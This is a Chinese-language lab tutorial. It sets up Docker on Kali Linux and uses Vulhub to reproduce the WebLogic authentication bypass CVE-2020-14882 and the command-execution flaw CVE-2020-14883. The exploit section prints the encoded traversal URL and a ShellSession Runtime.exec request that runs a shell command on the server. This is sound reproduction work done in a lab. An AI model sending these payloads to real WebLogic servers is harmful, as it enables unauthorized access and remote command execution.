kali配置docker环境及利用vulhub复现cve-2020-14882
字数 1121 2025-08-13 21:33:17
Kali Linux配置Docker环境及利用Vulhub复现CVE-2020-14882漏洞指南
一、Docker环境配置
1. 准备工作
在Kali Linux中配置Docker环境需要执行以下步骤:
-
更新系统源镜像:
apt-get update -
安装必要的协议和证书:
apt-get install -y apt-transport-https ca-certificates apt-get install dirmngr
2. 添加Docker GPG密钥和源
-
添加GPG密钥:
curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add - -
添加Docker源:
echo 'deb https://download.docker.com/linux/debian stretch stable' > /etc/apt/sources.list.d/docker.list
3. 安装Docker
-
再次更新系统:
apt-get update -
安装Docker CE:
apt-get install docker-ce在安装过程中出现Y/N提示时选择Y。
-
启动Docker服务:
service docker start -
安装Docker Compose:
apt install docker-compose
4. 验证安装
-
运行测试容器:
docker run hello-world如果看到欢迎信息,说明Docker安装成功。
-
查看Docker版本:
docker version
二、Vulhub漏洞环境搭建
1. 下载Vulhub
Vulhub是一个漏洞靶场,包含多种漏洞环境:
git clone https://github.com/vulhub/vulhub.git
如果下载速度慢,可以先在本地下载再传输到Kali中。
2. 启动Weblogic漏洞环境
-
进入Weblogic漏洞目录:
cd vulhub/weblogic/CVE-2020-14882 -
启动环境:
sudo docker-compose up -d成功后会显示绿色的"done"。
三、CVE-2020-14882漏洞复现
1. 漏洞概述
- CVE-2020-14882:可以绕过登录,通过特定路径直接进入后台,但权限较低
- CVE-2020-14883:允许后台任意用户通过HTTP协议执行任意命令
- 组合这两个漏洞可通过GET请求在远程Weblogic服务器上以未授权身份执行命令
受影响版本:
- WebLogic 10.3.6.0.0
- WebLogic 12.1.3.0.0
2. 漏洞利用
权限绕过(CVE-2020-14882)
访问以下URL可直接绕过登录进入后台:
/console/css/%252e%252e%252fconsole.portal
(%252e%252e%252f是../的URL编码)
命令执行(CVE-2020-14883)
通过com.tangosol.coherence.mvel2.sh.ShellSession执行命令:
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")
虽然会返回404错误,但命令已执行。
3. 验证漏洞
进入Kali中的Weblogic容器目录,检查/tmp/success1文件是否创建成功,确认漏洞复现成功。
四、总结
本教程详细介绍了在Kali Linux中配置Docker环境的完整步骤,以及如何利用Vulhub搭建Weblogic漏洞环境并复现CVE-2020-14882和CVE-2020-14883组合漏洞。关键点包括:
- Docker环境的正确配置和验证
- Vulhub漏洞环境的下载和启动
- CVE-2020-14882权限绕过漏洞的利用方法
- CVE-2020-14883命令执行漏洞的利用方法
- 漏洞复现后的验证方法
通过这个实践,可以加深对Weblogic漏洞的理解,并为后续的漏洞研究和安全测试打下基础。